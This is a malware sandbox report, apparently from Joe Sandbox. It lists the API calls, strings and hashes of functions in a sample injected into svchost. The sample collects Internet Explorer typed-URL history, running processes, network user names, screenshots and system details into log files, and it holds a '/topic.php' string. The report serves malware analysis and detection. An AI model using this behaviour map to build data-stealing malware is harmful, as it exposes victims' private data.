                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,?,76F92F70,00000000), ref: 026432B6
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,?,76F92F70,00000000), ref: 026432B9
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,?,76F92F70,00000000), ref: 026432C5
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,76F92F70,00000000), ref: 026432C8
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$memset$Name$CharComputerErrorFreeLastUpperUserValidate_snprintflstrcpyn$AllocAllocateBackslashCloseEnvironmentInformationOpenPathQueryValueVariableVolume
                                                                                                                                                                                                              • String ID: %02X$%53%59%53%54%45%4D%21%31%34%31%37%30%30%21%45%45%41%30%30%46%41%34$%s!%s!%08X$InstallDate$SYSTEM$SYSTEM!141700!EEA00FA4$Software\Microsoft\Windows NT\CurrentVersion$SystemDrive
                                                                                                                                                                                                              • API String ID: 3299431409-1739470118
                                                                                                                                                                                                              • Opcode ID: 22e71d9eae30c24abec652d4a3bfcd5645e42f0f7ec0a6727080bf50962ad87c
                                                                                                                                                                                                              • Instruction ID: ea8358e9bee34918e718e5e4ef9328fa8d444f1f2217db8188cfeb358b7b4c92
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 22e71d9eae30c24abec652d4a3bfcd5645e42f0f7ec0a6727080bf50962ad87c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7C510871E00245BBDB109BA59C85FAFBBBCEF84700F554685F946D7340EBB19950CBA0
                                                                                                                                                                                                              Function 02644900 Relevance: 42.2, APIs: 21, Strings: 3, Instructions: 178fileregistryCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000001,Software\Microsoft\Internet Explorer\TypedURLs,00000000,00020119,?), ref: 02644925
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 0264494D
                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,?,00000000,76F93490), ref: 02644987
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 026449A9
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,0000000C,00000000), ref: 026449B5
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,IE history:,0000000C,026458F1,00000000), ref: 026449C9
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,0000000C,00000000), ref: 026449D7
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 026449EB
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000001,00000000), ref: 026449F7
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,02685C1C,00000001,00000000,00000000), ref: 02644A0B
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000001,00000000), ref: 02644A19
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02644A43
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02644A4F
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02644A64
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 02644A74
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02644A88
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02644A94
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,02685B88,00000002,00000000,00000000), ref: 02644AA8
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02644AB6
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02644AD5
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 02644AEC
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$LockPointerUnlockWrite$_snprintf$CloseOpenQueryValue
                                                                                                                                                                                                              • String ID: IE history:$Software\Microsoft\Internet Explorer\TypedURLs$url%i
                                                                                                                                                                                                              • API String ID: 757183407-427538202
                                                                                                                                                                                                              • Opcode ID: 5bf4f2cb3579f52cae523f40d577e6976b99e30366a1c757b7e15c5c9db4d836
                                                                                                                                                                                                              • Instruction ID: df38974f890f9e290cfc6642600f244eb824a72c0daa1022d3b86647b4458f26
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5bf4f2cb3579f52cae523f40d577e6976b99e30366a1c757b7e15c5c9db4d836
                                                                                                                                                                                                              • Instruction Fuzzy Hash: FD512E71A81304BBF7209B909C9AFEF7B78EB45B04F514645F702BA1C0DBF05A858BA5
                                                                                                                                                                                                              Function 0265A350 Relevance: 37.7, APIs: 25, Instructions: 190threadmemoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentThread.KERNEL32 ref: 0265A376
                                                                                                                                                                                                              • GetThreadPriority.KERNEL32(00000000,?,0265A660,00000000,00000000,?,?,?,?,?,?,026598DA,00000000,02659730,0269A04C), ref: 0265A37D
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 0265A386
                                                                                                                                                                                                              • VirtualProtect.KERNEL32(0265A660,00000008,00000040,?,?,0265A660,00000000,00000000,?,?,?,?,?,?,026598DA,00000000), ref: 0265A3A7
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,00000012,00003000,00000040), ref: 0265A3C6
                                                                                                                                                                                                              • VirtualProtect.KERNEL32(00000000,00000012,00000040,?), ref: 0265A3E2
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(00000000,00000004), ref: 0265A3F8
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(00000004,-00000068), ref: 0265A406
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(00000005,00000000), ref: 0265A411
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(00000001,-0000009C), ref: 0265A424
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(00000002,-00000081), ref: 0265A435
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(00000003,-00000074), ref: 0265A444
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(00000004,-00000024), ref: 0265A453
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(00000005,-00000004), ref: 0265A462
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(00000006,?), ref: 0265A46A
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(00000002,-0000009D), ref: 0265A47D
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(00000003,-000000C2), ref: 0265A48E
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(00000004,-00000004), ref: 0265A49D
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(00000005,00000000), ref: 0265A4A9
                                                                                                                                                                                                              • VirtualProtect.KERNEL32(00000005,00000012,?,00000000), ref: 0265A4B3
                                                                                                                                                                                                              • GetCurrentThread.KERNEL32 ref: 0265A4BB
                                                                                                                                                                                                              • SetThreadPriority.KERNEL32(00000000), ref: 0265A4C2
                                                                                                                                                                                                              • GetCurrentThread.KERNEL32 ref: 0265A4FE
                                                                                                                                                                                                              • SetThreadPriority.KERNEL32(00000000), ref: 0265A505
                                                                                                                                                                                                              • VirtualProtect.KERNEL32(0265A660,00000008,00000000,0265A660), ref: 0265A51F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ExchangeInterlocked$Thread$Virtual$Protect$CurrentPriority$AllocCountTick
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2984368831-0
                                                                                                                                                                                                              • Opcode ID: 209df894b7ec3255ca92511fcc3051bfe51004f73133136da7e93de04fbd4ba3
                                                                                                                                                                                                              • Instruction ID: f78522eba1290b1dac0137899f5e391adb65215cdc36adc6da78365b8f3f942d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 209df894b7ec3255ca92511fcc3051bfe51004f73133136da7e93de04fbd4ba3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 50518271940229BFE711AF74CC46FAE77ACFF49710F154928F982E7280DB7899518BA0
                                                                                                                                                                                                              Function 004021D0 Relevance: 36.8, APIs: 3, Strings: 18, Instructions: 81fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNEL32(\\.\KmxAgent,00000000,00000000,00000000,00000003,00000080,00000000), ref: 00402313
                                                                                                                                                                                                              • DeviceIoControl.KERNEL32(00000000,86000054,000000B4,000000B4,?,00000004,?,00000000), ref: 00402343
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040234A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2599802364.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2599802364.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                                                                                                              • String ID: "$"$0$4$D$E$E$S$T$\\.\KmxAgent$d$e$g$m$m$s$t$t
                                                                                                                                                                                                              • API String ID: 33631002-3172865025
                                                                                                                                                                                                              • Opcode ID: e3633c6c15a619a578893c9fcc23eeae2132ba8b67b3abd9a16308d2c93bcb98
                                                                                                                                                                                                              • Instruction ID: 06d3a0cb986842bbdb89303b9aef8d686ca65c5df34e7f93c7eeed45953a557b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e3633c6c15a619a578893c9fcc23eeae2132ba8b67b3abd9a16308d2c93bcb98
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8E4184B0D01358DEEB20CF9599887DEBFB5BB04309F5081ADD6586B241C7BA0A89CF55
                                                                                                                                                                                                              Function 026444D0 Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 194memoryprocessCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02644503
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,00000000,76F93490), ref: 0264450E
                                                                                                                                                                                                              • Process32First.KERNEL32 ref: 02644531
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 0264454D
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02644567
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 026445A0
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 026445A7
                                                                                                                                                                                                              • memset.MSVCRT ref: 026445BB
                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?,?,00000000,?), ref: 026445EC
                                                                                                                                                                                                              • GetModuleFileNameExA.KERNELBASE(00000000,00000000,?,00000104,?,?,?,?,00000000,?), ref: 02644603
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 0264466C
                                                                                                                                                                                                              • Process32Next.KERNEL32(?,?), ref: 0264467B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleHeapProcessProcess32memset$AllocCloseCreateFileFirstInformationModuleNameNextOpenSnapshotToolhelp32_snprintf
                                                                                                                                                                                                              • String ID: %d%s$[System Process]$taskmgr{PIDProcess name
                                                                                                                                                                                                              • API String ID: 3808533164-4214784430
                                                                                                                                                                                                              • Opcode ID: 7e3ebfac28aa828444488b4523b776b4573f28dd6d3ee70096614f292c3b04e3
                                                                                                                                                                                                              • Instruction ID: be31d190d223f75ca73a9b3371a445000488ad7e7952b27479a9e578795c0b2c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7e3ebfac28aa828444488b4523b776b4573f28dd6d3ee70096614f292c3b04e3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: FF61F271904345AFD700DF64DC99BABBBE9AF84354F559A68F8C687240EF70D808CB92
                                                                                                                                                                                                              Function 02668890 Relevance: 31.7, APIs: 14, Strings: 4, Instructions: 187COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetFileType.KERNEL32(?,00000000,00000000), ref: 02668899
                                                                                                                                                                                                              • GetFileInformationByHandle.KERNEL32(?,?), ref: 026688B6
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$HandleInformationType
                                                                                                                                                                                                              • String ID: ,D0<$,D0<$D0<$D0<
                                                                                                                                                                                                              • API String ID: 4064226416-1748840775
                                                                                                                                                                                                              • Opcode ID: abdfc6b347eab7f8eb58b6c510d818b90667823f54fee061cf6612e170bf428a
                                                                                                                                                                                                              • Instruction ID: af8ef3f57ac9239448e3df53aab8bc24a555d7029af06c3cf9e492f55d1d4bdf
                                                                                                                                                                                                              • Opcode Fuzzy Hash: abdfc6b347eab7f8eb58b6c510d818b90667823f54fee061cf6612e170bf428a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EC518071D40218ABEB24CFA8DC89BFEBB78FB44704F544529FA05EB280D7749944CB91
                                                                                                                                                                                                              Function 02644710 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 185memoryfileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • NetQueryDisplayInformation.NETAPI32(00000000,00000001,00000000,000003E8,000000FF,00000000,00000000,00000000,00000000,76F93490,?,?,?,?,02645903,00000000), ref: 0264475A
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000014,?,?,?,?,02645903,00000000,00000000,00000000), ref: 026447A5
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,02645903,00000000,00000000,00000000), ref: 026447AC
                                                                                                                                                                                                              • memset.MSVCRT ref: 026447BF
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 0264480A
                                                                                                                                                                                                              • NetApiBufferFree.NETAPI32(00000000,?,?,?,?,02645903,00000000,00000000), ref: 02644841
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02644884
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,02645904,00000000), ref: 02644896
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,02645903,02645904,00000000,00000000), ref: 026448A8
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,02645904,00000000), ref: 026448B8
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,02645903), ref: 026448C7
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 026448CA
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,02645903), ref: 026448D7
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 026448DA
                                                                                                                                                                                                              • NetApiBufferFree.NETAPI32(00000000,?,?,?,?,02645903,00000000,00000000,00000000), ref: 026448ED
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$File$FreeProcess$Buffer$AllocDisplayInformationLockPointerQueryUnlockValidateWrite_snprintfmemset
                                                                                                                                                                                                              • String ID: %S$netuser{
                                                                                                                                                                                                              • API String ID: 37011087-3648794683
                                                                                                                                                                                                              • Opcode ID: 7bb07eebd21a6ffff5fa27760bebeed5dba8842a3f2df99edb24e3375aaef927
                                                                                                                                                                                                              • Instruction ID: df23329ab300c254dbc4f4af004aea17e9d148544b5478e741d72cad2b72e81b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7bb07eebd21a6ffff5fa27760bebeed5dba8842a3f2df99edb24e3375aaef927
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D851D075E40255ABDB108FA4DC99FEEBBB8EB49700F508654F941A7380EF70D940CBA0
                                                                                                                                                                                                              Function 02643DC7 Relevance: 28.2, APIs: 10, Strings: 6, Instructions: 233timeCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0269D3A4), ref: 02643DED
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0269D3A4), ref: 02643E23
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0269D3A4), ref: 02643E57
                                                                                                                                                                                                              • GetDateFormatA.KERNEL32(00000409,00000000,00000000,dd;MMM;yyyy,?,00000104), ref: 02643EA0
                                                                                                                                                                                                              • GetTimeFormatA.KERNELBASE(00000409,00000000,00000000,HH;mm;ss,?,00000104), ref: 02643EC0
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02643EE5
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0269D3A4), ref: 02643F37
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0269D3A4), ref: 02643FB7
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0269D3A4,00000000,?), ref: 0264404B
                                                                                                                                                                                                                • Part of subcall function 026539D0: EnterCriticalSection.KERNEL32(0268FB68,76F90F00,00000000,76F92F00), ref: 026539E9
                                                                                                                                                                                                                • Part of subcall function 026539D0: GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 026539FB
                                                                                                                                                                                                                • Part of subcall function 026539D0: _snprintf.MSVCRT ref: 02653A1B
                                                                                                                                                                                                                • Part of subcall function 026539D0: SetCurrentDirectoryA.KERNEL32(?), ref: 02653A2B
                                                                                                                                                                                                                • Part of subcall function 026539D0: PathAddBackslashA.SHLWAPI(?), ref: 02653B00
                                                                                                                                                                                                                • Part of subcall function 026479C0: SetFileAttributesA.KERNEL32(00000000,00000000,02658ECD,?,?,?,?,?,?), ref: 026479C8
                                                                                                                                                                                                                • Part of subcall function 026479C0: DeleteFileA.KERNEL32(00000000,?,?,?,?,?,?), ref: 026479CF
                                                                                                                                                                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 02644072
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: BackslashPath$CurrentDirectoryFileFormat_snprintf$AttributesCriticalDateDeleteEnterFreeSectionTimeVirtual
                                                                                                                                                                                                              • String ID: DEBUG$HH;mm;ss$dd;MMM;yyyy$debug_%s_%s.log$scr.bmp$sysinfo.log
                                                                                                                                                                                                              • API String ID: 203013662-44577846
                                                                                                                                                                                                              • Opcode ID: bb1fb45829d5c99061ec736ccef240e8bf1816d434de53e4508d4daac18cac22
                                                                                                                                                                                                              • Instruction ID: 33da6a7ebad7cddb78e2dea946b30ce48a751407c58cdcd58abe7115181ae19d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bb1fb45829d5c99061ec736ccef240e8bf1816d434de53e4508d4daac18cac22
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 077139316006465BDF15EA385CA57EABBE6AF46300F6446D8E8CADB340DF719A58CB80
                                                                                                                                                                                                              Function 026463F0 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 204stringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memset$strstrstrtol
                                                                                                                                                                                                              • String ID: %s%s$1676d5775e05c50b46baa5579d4fc7$eyuioa$qwrtpsdfghjklzxcvbnm
                                                                                                                                                                                                              • API String ID: 600650289-3097137778
                                                                                                                                                                                                              • Opcode ID: eb3a3ce386bc0a4ac2e3c3d3ac831e765f811a74ca436282bb725c86d3131c06
                                                                                                                                                                                                              • Instruction ID: a0448fb1381c9b618a855c86241451c686a704270105b651a527185cb47d1bb0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: eb3a3ce386bc0a4ac2e3c3d3ac831e765f811a74ca436282bb725c86d3131c06
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B771BD30E443446BDB25DB78DC80BDE7BB9AF49300F1046A8E989E7380E7745B85CB54
                                                                                                                                                                                                              Function 02653800 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 164memoryfileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02653821
                                                                                                                                                                                                              • memset.MSVCRT ref: 0265383C
                                                                                                                                                                                                              • GetTempPathA.KERNEL32(00000104,?,?,?,?,76F90F00,00000000,00000000), ref: 02653856
                                                                                                                                                                                                              • GetTempFileNameA.KERNEL32(?,00000000,00000000,?,?,?,?,76F90F00,00000000,00000000), ref: 0265386C
                                                                                                                                                                                                                • Part of subcall function 02646C70: memset.MSVCRT ref: 02646CA1
                                                                                                                                                                                                                • Part of subcall function 02646C70: memset.MSVCRT ref: 02646CBF
                                                                                                                                                                                                                • Part of subcall function 02646C70: RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?,?,?,?,?,?,00000000), ref: 02646CDB
                                                                                                                                                                                                                • Part of subcall function 02646C70: RegQueryValueExA.KERNEL32(?,75775DDDa,00000000,00000001,?,00000104,?,?,?,?,?,00000000), ref: 02646D02
                                                                                                                                                                                                                • Part of subcall function 02646C70: GetProcessHeap.KERNEL32(00000008,00000110,?,?,?,?,?,?,?,00000000), ref: 02646D7A
                                                                                                                                                                                                                • Part of subcall function 02646C70: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02646D81
                                                                                                                                                                                                                • Part of subcall function 02646C70: memset.MSVCRT ref: 02646D95
                                                                                                                                                                                                                • Part of subcall function 02646C70: lstrcpynA.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,00000000), ref: 02646DAE
                                                                                                                                                                                                                • Part of subcall function 02646C70: RegCloseKey.ADVAPI32(?,?,?,?,?,?,00000000), ref: 02646DBC
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,76F90F00,00000000,00000000), ref: 026538BB
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,?,?,76F90F00,00000000,00000000), ref: 026538C2
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,76F90F00,00000000,00000000), ref: 026538CE
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,76F90F00,00000000,00000000), ref: 026538D5
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000,00000001,00000000,00000000,/topic.php,?,00000001,00000001,00000001,00000000,00000001,?,?,?,76F90F00), ref: 0265394D
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?,?,?,?,76F90F00,00000000,00000000), ref: 0265395A
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,76F90F00,00000000,00000000), ref: 02653998
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,?,?,76F90F00,00000000,00000000), ref: 0265399B
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,76F90F00,00000000,00000000), ref: 026539A7
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,76F90F00,00000000,00000000), ref: 026539AA
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Processmemset$File$FreeTempValidate$AllocAttributesCloseDeleteNameOpenPathQueryValuelstrcpyn
                                                                                                                                                                                                              • String ID: /topic.php
